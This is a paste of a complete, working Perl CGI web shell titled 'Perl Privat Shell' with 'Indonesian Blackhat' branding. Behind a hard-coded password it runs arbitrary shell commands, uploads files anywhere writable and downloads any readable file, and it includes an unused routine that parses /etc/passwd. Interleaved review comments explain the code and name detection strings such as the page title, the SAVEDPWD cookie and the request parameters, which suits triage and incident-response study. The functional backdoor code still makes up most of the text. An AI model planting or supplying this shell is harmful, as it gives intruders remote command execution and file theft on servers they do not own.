xtartech

cgi

Mar 29th, 2017
  1. #!/usr/bin/perl -I/usr/local/bandmin
  # NOTE(review): this listing is a password-gated CGI web shell. The subs below
  # run shell commands, write uploaded files and send back files chosen by the
  # requester. Strings visible in this listing that are usable for triage: the
  # page title "Perl Privat Shell", the cookie name SAVEDPWD, and the request
  # parameters a, c, d, f, o and p.
  # There is no `use strict` / `use warnings`; every variable is a package global.
  2. $NTCmdSep = "&";
  3. $UnixCmdSep = ";";
  # Seconds passed to alarm() before CommandTimeout fires.
  4. $CommandTimeoutDuration = 300;
  # When true, ExecuteCommand streams output through a piped open instead of backticks.
  5. $ShowDynamicOutput = 1;
  # Hard-coded shared secret; it is compared against the posted "p" field and
  # against the SAVEDPWD cookie.
  6. $password = "jkt48";
  # $WinNT is not assigned anywhere in this listing, so each ternary below
  # selects its Unix value.
  7. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
  8. $CmdPwd = ($WinNT ? "cd" : "pwd");
  9. $PathSep = ($WinNT ? "\\" : "/");
  # Suffix appended to every command so stderr is merged into the captured output.
  10. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
  11. sub ReadParse
  12. {
  # Parses the CGI request into %in (and uses $in / @in as scratch). With an
  # argument, the typeglob passed by the caller is aliased instead of the
  # global *in. GET data comes from QUERY_STRING, POST data from STDIN.
  13. local (*in) = @_ if @_;
  14. local ($i, $loc, $key, $val);
  15.  
  # Scalar context: holds the match result (true/false), not the boundary text.
  16. $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
  17.  
  18. if($ENV{'REQUEST_METHOD'} eq "GET")
  19. {
  20. $in = $ENV{'QUERY_STRING'};
  21. }
  22. elsif($ENV{'REQUEST_METHOD'} eq "POST")
  23. {
  # `&` is the bitwise operator here, not logical `&&`.
  24. binmode(STDIN) if $MultipartFormData & $WinNT;
  # Reads as many bytes as the client-supplied CONTENT_LENGTH states; no cap is applied.
  25. read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
  26. }
  27.  
  28. # handle file upload data
  29. if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  30. {
  31. $Boundary = '--'.$1; # please refer to RFC1867
  # The boundary comes from the request header and is used as a regex
  # without \Q...\E, so metacharacters in it are interpreted by split.
  32. @list = split(/$Boundary/, $in);
  # Only the first part is treated as the uploaded file: the text before the
  # first blank line is its header, the text after it is the file content.
  33. $HeaderBody = $list[1];
  34. $HeaderBody =~ /\r\n\r\n|\n\n/;
  35. $Header = $`;
  36. $Body = $';
  37. $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
  38. $in{'filedata'} = $Body;
  # Client-supplied filename, with quotes and all whitespace stripped.
  39. $Header =~ /filename=\"(.+)\"/;
  40. $in{'f'} = $1;
  41. $in{'f'} =~ s/\"//g;
  42. $in{'f'} =~ s/\s//g;
  43.  
  44. # parse trailer
  # Remaining parts: the first quoted \w+ token is the field name, everything
  # after it is the value (blank-line and trailing-newline trimmed, then
  # percent-decoded).
  45. for($i=2; $list[$i]; $i++)
  46. {
  # NOTE(review): the trailing `$` is an end-of-string anchor, so this
  # substitution only fires when the part is a single line ending in "name=".
  47. $list[$i] =~ s/^.+name=$//;
  48. $list[$i] =~ /\"(\w+)\"/;
  49. $key = $1;
  50. $val = $';
  51. $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
  52. $val =~ s/%(..)/pack("c", hex($1))/ge;
  53. $in{$key} = $val;
  54. }
  55. }
  56. else # standard post data (url encoded, not multipart)
  57. {
  58. @in = split(/&/, $in);
  59. foreach $i (0 .. $#in)
  60. {
  # "+" becomes a space, the pair is split on the first "=", and both halves
  # are percent-decoded; repeated keys are joined with "\0".
  61. $in[$i] =~ s/\+/ /g;
  62. ($key, $val) = split(/=/, $in[$i], 2);
  63. $key =~ s/%(..)/pack("c", hex($1))/ge;
  64. $val =~ s/%(..)/pack("c", hex($1))/ge;
  65. $in{$key} .= "\0" if (defined($in{$key}));
  66. $in{$key} .= $val;
  67. }
  68. }
  69. }
  70.  
  71. #------------------------------------------------------------------------------
  72. # Prints the HTML Page Header
  73. # Argument 1: Form item name to which focus should be set
  74. #------------------------------------------------------------------------------
  75. sub foo
  76. {
  # Reads /etc/passwd and returns a reference to a hash keyed by login name,
  # each entry holding that account's uid, gid and home directory.
  # NOTE(review): the header comment above this sub describes PrintPageHeader,
  # not this code, and nothing in this listing calls foo.
  77. my ( $login, $p, $uid, $gid, $gecos, $dir, $s );
  78.  
  79. my %HoH = ();
  80.  
  81. my $file = '/etc/passwd';
  # Two-argument open on a bareword handle; dies if the file cannot be opened.
  82. open( PASSWD, "< $file" ) or die "Can't open $file : $!";
  83.  
  84. while( <PASSWD> ) {
  # Fields follow the passwd(5) order; password, gecos and shell are read but discarded.
  85. ( $login, $p, $uid, $gid, $gecos, $dir, $s ) = split( ':' );
  86.  
  87. $HoH{ $login }{ 'uid' } = $uid;
  88. $HoH{ $login }{ 'gid' } = $gid;
  89. $HoH{ $login }{ 'dir' } = $dir;
  90. }
  91.  
  92. close PASSWD;
  93.  
  94. return \%HoH;
  95. }
  96. sub PrintPageHeader
  97. {
  # Emits the Content-type header and the opening HTML of every page.
  # The sub never reads @_, so the "p" / "c" / "f" argument its callers pass
  # is ignored.
  # $CurrentDir is percent-encoded for the upload/download links; $HtmlMetaHeader,
  # $ScriptLocation and $ServerName are interpolated into the markup as-is.
  # The <title> text below is a fixed string that can serve as a content
  # signature when scanning web roots or response bodies.
  98. $EncodedCurrentDir = $CurrentDir;
  99. $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  100. print "Content-type: text/html\n\n";
  101. print <<END;
  102. <html>
  103. <head>
  104. <title>Perl Privat Shell</title>
  105. <LINK rel="SHORTCUT ICON" href="http://i.imgur.com/n54dIAD.gif">
  106. $HtmlMetaHeader
  107. </head>
  108. <center><h4 style="font-size:50px;text-shadow: 1px 1px 5px red;">Indonesian Blackhat</h4></center>
  109. <body><BODY BGCOLOR="#000000" repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  110. <td colspan="2" bgcolor="black"><p align="center">s<font face="Verdana" size="2">
  111. <a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
  112. <a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
  113. <a href="$ScriptLocation?a=logout">Sign Out</a>
  114. <table border="0" width="100%" cellspacing="0" cellpadding="2">
  115. <p align="center"><font face="Verdana" size="3" color="GREEN">Nginx1337 - Server : <font color="gray">$ServerName</font></font>
  116. </tr>
  117. <tr>
  118. </font></td>
  119. </tr>
  120. </table>
  121. <br><center><b><font face="Courier New" size="4" color="RED">Use at <b><font face="Courier New" size="4" color="WHITE"> your own risk ^_~</font></center>
  122. <font color="GREEN" size="3">
  123. END
  124. }
  125.  
  126. #------------------------------------------------------------------------------
  127. # Prints the Login Screen
  128. #------------------------------------------------------------------------------
  129. sub PrintLoginScreen
  130. {
  # Prints a fixed "-- Enter Password --" banner. The banner is built with
  # q$...$ (a single-quoted string delimited by "$"), so nothing inside it is
  # interpolated.
  131. $Message = q$<pre><font color="GREEN">
  132. -- Enter Password --
  133. </font></pre>
  134. $;
  135. #'
  136. print <<END;
  137. $Message
  138. END
  139. }
  140.  
  141. #------------------------------------------------------------------------------
  142. # Prints the message that informs the user of a failed login
  143. #------------------------------------------------------------------------------
  144. sub PrintLoginFailedMessage
  145. {
  # Prints a fixed failure notice. The "login: root" line is static text; the
  # listing has no user-name field and the text does not depend on the request.
  146. print <<END;
  147. <code>
  148. <br>login: root<br>
  149. password:<br>
  150. wrong password !!<br><br>
  151. </code>
  152. END
  153. }
  154.  
  155. #------------------------------------------------------------------------------
  156. # Prints the HTML form for logging in
  157. #------------------------------------------------------------------------------
  158. sub PrintLoginForm
  159. {
  # Prints the login form: a POST back to $ScriptLocation carrying a=login and
  # the password in field "p".
  160. print <<END;
  161. <code>
  162. <form name="f" method="POST" action="$ScriptLocation">
  163. <input type="hidden" name="a" value="login"><font color="green">Password : </font><input type="password" name="p">
  164. <input type="submit" value="Enter">
  165. </form>
  166. </code>
  167. END
  168. }
  169.  
  170. #------------------------------------------------------------------------------
  171. # Prints the footer for the HTML Page
  172. #------------------------------------------------------------------------------
  173. sub PrintPageFooter
  174. {
  # Closes the <font>, <body> and <html> elements opened by PrintPageHeader.
  175. print "</font></body></html>";
  176. }
  177.  
  178. #------------------------------------------------------------------------------
  179. # Retrieves the values of all cookies. The cookies can be accessed using the
  180. # variable $Cookies{''}
  181. #------------------------------------------------------------------------------
  182. sub GetCookies
  183. {
  # Fills the global %Cookies from the HTTP_COOKIE environment variable.
  # Pairs are split on "; " and then on "="; names and values are stored
  # without any decoding.
  184. @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
  185. foreach $cookie(@httpcookies)
  186. {
  # No limit is given to split, so only the text between the first and second
  # "=" is kept as the value.
  187. ($id, $val) = split(/=/, $cookie);
  188. $Cookies{$id} = $val;
  189. }
  190. }
  191.  
  192. #------------------------------------------------------------------------------
  193. # Prints the screen when the user logs out
  194. #------------------------------------------------------------------------------
  195. sub PrintLogoutScreen
  196. {
  # Prints a fixed message styled after a telnet disconnect notice.
  197. print "<code>Connection closed by foreign host.<br><br></code>";
  198. }
  199.  
  200. #------------------------------------------------------------------------------
  201. # Logs out the user and allows the user to login again
  202. #------------------------------------------------------------------------------
  203. sub PerformLogout
  204. {
  # Blanks the SAVEDPWD cookie, then shows the logout notice followed by the
  # login screen and form. The Set-Cookie line must precede PrintPageHeader,
  # which ends the HTTP header section.
  205. print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
  206. &PrintPageHeader("p");
  207. &PrintLogoutScreen;
  208. &PrintLoginScreen;
  209. &PrintLoginForm;
  210. &PrintPageFooter;
  211. }
  212.  
  213. #------------------------------------------------------------------------------
  214. # This function is called to login the user. If the password matches, it
  215. # displays a page that allows the user to run commands. If the password doesn't
  216. # match or if no password is entered, it displays a form that allows the user
  217. # to login
  218. #------------------------------------------------------------------------------
  219. sub PerformLogin
  220. {
  # Compares the posted password ($LoginPassword, field "p") with the
  # hard-coded $password using a plain string comparison.
  221. if($LoginPassword eq $password) # password matched
  222. {
  # The cookie value is the password itself, sent with no cookie attributes.
  # For responders: any captured request or response that carries a SAVEDPWD
  # cookie therefore identifies a session of this script and contains its
  # secret.
  223. print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
  224. &PrintPageHeader("c");
  225. &PrintCommandLineInputForm;
  226. &PrintPageFooter;
  227. }
  228. else # password didn't match
  229. {
  # No attempt counter, delay or logging is present on the failure path.
  230. &PrintPageHeader("p");
  231. &PrintLoginScreen;
  232. if($LoginPassword ne "") # some password was entered
  233. {
  234. &PrintLoginFailedMessage;
  235. }
  236. &PrintLoginForm;
  237. &PrintPageFooter;
  238. }
  239. }
  240.  
  241. #------------------------------------------------------------------------------
  242. # Prints the HTML form that allows the user to enter commands
  243. #------------------------------------------------------------------------------
  244. sub PrintCommandLineInputForm
  245. {
  # Prints the command form: a POST to $ScriptLocation with a=command, the
  # working directory in hidden field "d" and the command text in field "c".
  # The working directory is round-tripped through the client, so the value
  # that comes back in "d" is whatever the requester sends.
  # $CurrentDir and $ServerName are interpolated into the HTML without escaping.
  246. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  247. print <<END;
  248. <code>
  249. <form name="f" method="POST" action="$ScriptLocation">
  250. <input type="hidden" name="a" value="command">
  251. <input type="hidden" name="d" value="$CurrentDir">
  252. <font color="GREEN">$Prompt</font>
  253. <input type="text" name="c" size="25">
  254. <input type="submit" value="Enter">
  255. </form>
  256. </code>
  257.  
  258. END
  259. }
  260.  
  261. #------------------------------------------------------------------------------
  262. # Prints the HTML form that allows the user to download files
  263. #------------------------------------------------------------------------------
  264. sub PrintFileDownloadForm
  265. {
  # Prints the download form: a POST to $ScriptLocation with a=download, the
  # working directory in hidden field "d" and the requested path in field "f".
  266. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  267. print <<END;
  268. <code>
  269. <form name="f" method="POST" action="$ScriptLocation">
  270. <input type="hidden" name="d" value="$CurrentDir">
  271. <input type="hidden" name="a" value="download">
  272. $Prompt download<br><br>
  273. Filename: <input type="text" name="f" size="35"><br><br>
  274. Download: <input type="submit" value="Jebret">
  275. </form>
  276. </code>
  277. END
  278. }
  279.  
  280. #------------------------------------------------------------------------------
  281. # Prints the HTML form that allows the user to upload files
  282. #------------------------------------------------------------------------------
  283. sub PrintFileUploadForm
  284. {
  # Prints the upload form: a multipart/form-data POST to $ScriptLocation with
  # a=upload, the file in field "f", the target directory in hidden field "d"
  # and an optional o=overwrite checkbox.
  285. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  286. print <<END;
  287. <code>
  288. <form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
  289. $Prompt upload<br><br>
  290. Filename: <input type="file" name="f" size="35"><br><br>
  291. Options: <input type="checkbox" name="o" value="overwrite">
  292. Overwrite if it Exists<br><br>
  293. Upload: <input type="submit" value="cr00t">
  294. <input type="hidden" name="d" value="$CurrentDir">
  295. <input type="hidden" name="a" value="upload">
  296. </form>
  297. </code>
  298. END
  299. }
  300.  
  301. #------------------------------------------------------------------------------
  302. # This function is called when the timeout for a command expires. We need to
  303. # terminate the script immediately. This function is valid only on Unix. It is
  304. # never called when the script is running on NT.
  305. #------------------------------------------------------------------------------
  306. sub CommandTimeout
  307. {
  # SIGALRM handler installed by ExecuteCommand. It cancels the alarm, closes
  # the <xmp> output element, prints a timeout notice plus the command form
  # and footer, and exits the CGI process.
  # NOTE(review): despite the "Killed it!" text, this handler sends no signal
  # to the spawned command; it only exits. Whether the child keeps running
  # afterwards is not decided by this code - verify on the host when triaging.
  308. if(!$WinNT)
  309. {
  310. alarm(0);
  311. print <<END;
  312. </xmp>
  313. <code>
  314. Command exceeded maximum time of $CommandTimeoutDuration second(s).
  315. <br>Killed it!
  316. <code>
  317. END
  318. &PrintCommandLineInputForm;
  319. &PrintPageFooter;
  320. exit;
  321. }
  322. }
  323.  
  324. #------------------------------------------------------------------------------
  325. # This function is called to execute commands. It displays the output of the
  326. # command and allows the user to enter another command. The change directory
  327. # command is handled differently. In this case, the new directory is stored in
  328. # an internal variable and is used each time a command has to be executed. The
  329. # output of the change directory command is not displayed to the users
  330. # therefore error messages cannot be displayed.
  331. #------------------------------------------------------------------------------
  332. sub ExecuteCommand
  333. {
  # Runs the request's "c" field ($RunCommand) through the system shell, in
  # the directory given by the request's "d" field ($CurrentDir), and prints
  # the output into the page. Both values are taken from the request
  # unmodified, so this sub is the remote command execution primitive of the
  # script.
  # For detection: each a=command request makes the CGI process start a shell
  # whose command line begins with `cd "<dir>";`.
  334. if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
  335. {
  336. # we change the directory internally. The output of the
  337. # command is not displayed.
  338.  
  339. $OldDir = $CurrentDir;
  # Builds `cd "<current>"; cd <target>; pwd` and captures the resulting
  # directory with backticks; chop drops the trailing newline.
  340. $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  341. chop($CurrentDir = `$Command`);
  342. &PrintPageHeader("c");
  343. &PrintCommandLineInputForm;
  344. print "<div style='float: center; text-align: left;'>";
  345. $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
  346. print "<code>$Prompt $RunCommand</code>";
  347. }
  348. else # some other command, display the output
  349. {
  350. &PrintPageHeader("c");
  351. &PrintCommandLineInputForm;
  352. print "<div style='float: center; text-align: left;'>";
  353. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  # The command text is echoed into the HTML unescaped; the output goes inside
  # an <xmp> element.
  354. print "<code>$Prompt $RunCommand</code><xmp style='color: #00FF00;'>";
  355. $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
  356. if(!$WinNT)
  357. {
  # Arms the $CommandTimeoutDuration-second timeout handled by CommandTimeout.
  358. $SIG{'ALRM'} = \&CommandTimeout;
  359. alarm($CommandTimeoutDuration);
  360. }
  361. if($ShowDynamicOutput) # show output as it is generated
  362. {
  # Autoflush on, then a two-argument piped open (trailing " |") on a bareword
  # handle; the return value of open is not checked.
  363. $|=1;
  364. $Command .= " |";
  365. open(CommandOutput, $Command);
  366. while(<CommandOutput>)
  367. {
  368. $_ =~ s/(\n|\r\n)$//;
  369. print "$_\n";
  370. }
  371. $|=0;
  372. }
  373. else # show output after command completes
  374. {
  375. print `$Command`;
  376. }
  377. if(!$WinNT)
  378. {
  379. alarm(0);
  380. }
  381. print "</xmp>";
  382. }
  383. print "</div>";
  384. &PrintPageFooter;
  385. }
  386.  
  387. #------------------------------------------------------------------------------
  388. # This function displays the page that contains a link which allows the user
  389. # to download the specified file. The page also contains an auto-refresh
  390. # feature that starts the download automatically.
  391. # Argument 1: Fully qualified filename of the file to be downloaded
  392. #------------------------------------------------------------------------------
  393. sub PrintDownloadLinkPage
  394. {
  # Shows an interstitial page for the file path passed as the first argument.
  # If the path exists, the page carries a link and a 1-second meta refresh
  # that re-request the script with a=download, f=<encoded path> and o=go;
  # otherwise the download form is shown again with an error line.
  395. local($FileUrl) = @_;
  396. if(-e $FileUrl) # if the file exists
  397. {
  398. # encode the file link so we can send it to the browser
  # Every non-alphanumeric character is replaced by "%" plus its hex bytes.
  399. $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  400. $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
  # Picked up by PrintPageHeader, which interpolates $HtmlMetaHeader into <head>.
  401. $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
  402. &PrintPageHeader("c");
  403. print <<END;
  404. <code>
  405. Sending File $TransferFile...<br>
  406. If the download does not start automatically,
  407. <a href="$DownloadLink">Click Here</a>.
  408. </code>
  409. END
  410. &PrintCommandLineInputForm;
  411. &PrintPageFooter;
  412. }
  413. else # file doesn't exist
  414. {
  415. &PrintPageHeader("f");
  # The requested path and $! are printed into the HTML unescaped.
  416. print "<code>Failed to download $FileUrl: $!</code>";
  417. &PrintFileDownloadForm;
  418. &PrintPageFooter;
  419. }
  420. }
  421.  
  422. #------------------------------------------------------------------------------
  423. # This function reads the specified file from the disk and sends it to the
  424. # browser, so that it can be downloaded by the user.
  425. # Argument 1: Fully qualified pathname of the file to be sent.
  426. #------------------------------------------------------------------------------
  427. sub SendFileToBrowser
  428. {
  # Streams the file named by the first argument to the client as an
  # attachment. The path originates from the request's "f" and "d" fields, so
  # any file the CGI process can read can be returned.
  429. local($SendFile) = @_;
  # Two-argument open on a bareword handle: Perl parses the string itself for
  # mode characters, so the value is not treated purely as a file name.
  430. if(open(SENDFILE, $SendFile)) # file opened for reading
  431. {
  432. if($WinNT)
  433. {
  434. binmode(SENDFILE);
  435. binmode(STDOUT);
  436. }
  # Element 7 of stat() is the size in bytes.
  437. $FileSize = (stat($SendFile))[7];
  # The match leaves the last path component in $1; $Filename keeps the full path.
  438. ($Filename = $SendFile) =~ m!([^/^\\]*)$!;
  439. print "Content-Type: application/x-unknown\n";
  440. print "Content-Length: $FileSize\n";
  # The file name is placed in the header unquoted and unfiltered.
  441. print "Content-Disposition: attachment; filename=$1\n\n";
  442. print while(<SENDFILE>);
  443. close(SENDFILE);
  444. }
  445. else # failed to open file
  446. {
  447. &PrintPageHeader("f");
  448. print "<code>Failed to download $SendFile: $!</code>";
  449. &PrintFileDownloadForm;
  450. &PrintPageFooter;
  451. }
  452. }
  453.  
  454.  
  455. #------------------------------------------------------------------------------
  456. # This function is called when the user downloads a file. It displays a message
  457. # to the user and provides a link through which the file can be downloaded.
  458. # This function is also called when the user clicks on that link. In this case,
  459. # the file is read and sent to the browser.
  460. #------------------------------------------------------------------------------
  461. sub BeginDownload
  462. {
  # Resolves $TransferFile to a full path and either sends the file
  # ($Options eq "go") or prints the link page.
  # NOTE(review): the body repeats the path and dispatch logic of DownloadFile
  # without its empty-filename check, and nothing in this listing calls it.
  463. # get fully qualified path of the file to be downloaded
  # `&` and `|` are the bitwise operators, applied to the match results.
  464. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  465. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  466. {
  467. $TargetFile = $TransferFile;
  468. }
  469. else # path is relative
  470. {
  # Copies $CurrentDir into $TargetFile and drops one trailing slash or
  # backslash before appending the relative name; ".." components are not
  # filtered.
  471. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  472. $TargetFile .= $PathSep.$TransferFile;
  473. }
  474.  
  475. if($Options eq "go") # we have to send the file
  476. {
  477. &SendFileToBrowser($TargetFile);
  478. }
  479. else # we have to send only the link page
  480. {
  481. &PrintDownloadLinkPage($TargetFile);
  482. }
  483. }
  484.  
  485. #------------------------------------------------------------------------------
  486. # This function is called when the user wants to upload a file. If the
  487. # file is not specified, it displays a form allowing the user to specify a
  488. # file, otherwise it starts the upload process.
  489. #------------------------------------------------------------------------------
  490. sub UploadFile
  491. {
  # Writes the uploaded content ($in{'filedata'}, set by ReadParse) to a file
  # in $CurrentDir named after the last path component of the client-supplied
  # file name. The directory comes from the request's "d" field, so the write
  # can land anywhere the CGI process has write access.
  # For responders: files created by the web server account shortly after
  # a=upload requests to this script are candidates for review.
  492. # if no file is specified, print the upload form again
  493. if($TransferFile eq "")
  494. {
  495. &PrintPageHeader("f");
  496. &PrintFileUploadForm;
  497. &PrintPageFooter;
  498. return;
  499. }
  500. &PrintPageHeader("c");
  501.  
  502. # start the uploading process
  503. print "<code>Uploading $TransferFile to $CurrentDir...<br>";
  504.  
  505. # get the fully qualified pathname of the file to be created
  # Copies $CurrentDir into $TargetName, drops one trailing slash or backslash,
  # then appends the base name captured from $TransferFile.
  506. chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
  507. $TransferFile =~ m!([^/^\\]*)$!;
  508. $TargetName .= $PathSep.$1;
  509.  
  510. $TargetFileSize = length($in{'filedata'});
  511. # if the file exists and we are not supposed to overwrite it
  512. if(-e $TargetName && $Options ne "overwrite")
  513. {
  514. print "Failed: Destination file already exists.<br>";
  515. }
  516. else # file is not present
  517. {
  # Two-argument open with the ">" mode concatenated into the path string;
  # the existing file, if any, is truncated.
  518. if(open(UPLOADFILE, ">$TargetName"))
  519. {
  520. binmode(UPLOADFILE) if $WinNT;
  # Neither this print nor the close is checked for errors.
  521. print UPLOADFILE $in{'filedata'};
  522. close(UPLOADFILE);
  523. print "Transfered $TargetFileSize Bytes.<br>";
  524. print "File Path: $TargetName<br>";
  525. }
  526. else
  527. {
  528. print "Failed: $!<br>";
  529. }
  530. }
  531. print "</code>";
  532. &PrintCommandLineInputForm;
  533. &PrintPageFooter;
  534. }
  535.  
  536. #------------------------------------------------------------------------------
  537. # This function is called when the user wants to download a file. If the
  538. # filename is not specified, it displays a form allowing the user to specify a
  539. # file, otherwise it displays a message to the user and provides a link
  540. # through which the file can be downloaded.
  541. #------------------------------------------------------------------------------
  542. sub DownloadFile
  543. {
  # Handler for a=download. With no file name it shows the download form;
  # otherwise it resolves $TransferFile (request field "f") against
  # $CurrentDir (request field "d") and either streams the file (o=go) or
  # prints the link page.
  544. # if no file is specified, print the download form again
  545. if($TransferFile eq "")
  546. {
  547. &PrintPageHeader("f");
  548. &PrintFileDownloadForm;
  549. &PrintPageFooter;
  550. return;
  551. }
  552.  
  553. # get fully qualified path of the file to be downloaded
  # `&` and `|` are the bitwise operators, applied to the match results.
  # An absolute path is used as given; no directory restriction is applied.
  554. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  555. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  556. {
  557. $TargetFile = $TransferFile;
  558. }
  559. else # path is relative
  560. {
  # Copies $CurrentDir into $TargetFile and drops one trailing slash or
  # backslash before appending the relative name; ".." components are not
  # filtered.
  561. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  562. $TargetFile .= $PathSep.$TransferFile;
  563. }
  564.  
  565. if($Options eq "go") # we have to send the file
  566. {
  567. &SendFileToBrowser($TargetFile);
  568. }
  569. else # we have to send only the link page
  570. {
  571. &PrintDownloadLinkPage($TargetFile);
  572. }
  573. }
  574.  
  575. #------------------------------------------------------------------------------
  576. # Main Program - Execution Starts Here
  577. #------------------------------------------------------------------------------
  # Request flow: parse parameters and cookies, copy them into globals, then
  # dispatch on the "a" parameter. Parameter map, as read below:
  #   p = password, c = command text, f = file name, o = option,
  #   a = action, d = working directory.
  578. &ReadParse;
  579. &GetCookies;
  580.  
  581. $ScriptLocation = $ENV{'SCRIPT_NAME'};
  582. $ServerName = $ENV{'SERVER_NAME'};
  583. $LoginPassword = $in{'p'};
  584. $RunCommand = $in{'c'};
  585. $TransferFile = $in{'f'};
  586. $Options = $in{'o'};
  587.  
  588. $Action = $in{'a'};
  589. $Action = "login" if($Action eq ""); # no action specified, use default
  590.  
  591. # get the directory in which the commands will be executed
  592. $CurrentDir = $in{'d'};
  # When "d" is empty, `pwd` is run through backticks; this happens before the
  # login check below, so an unauthenticated request already spawns a process.
  593. chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
  594.  
  # Authentication is a string comparison of the SAVEDPWD cookie with the
  # hard-coded password; there is no session state on the server side.
  595. $LoggedIn = $Cookies{'SAVEDPWD'} eq $password;
  596.  
  # Every action other than "login" requires $LoggedIn; an unrecognised action
  # from a logged-in client falls through all branches and prints nothing.
  597. if($Action eq "login" || !$LoggedIn) # user needs/has to login
  598. {
  599. &PerformLogin;
  600. }
  601. elsif($Action eq "command") # user wants to run a command
  602. {
  603. &ExecuteCommand;
  604. }
  605. elsif($Action eq "upload") # user wants to upload a file
  606. {
  607. &UploadFile;
  608. }
  609. elsif($Action eq "download") # user wants to download a file
  610. {
  611. &DownloadFile;
  612. }
  613. elsif($Action eq "logout") # user wants to logout
  614. {
  615. &PerformLogout;
  616. }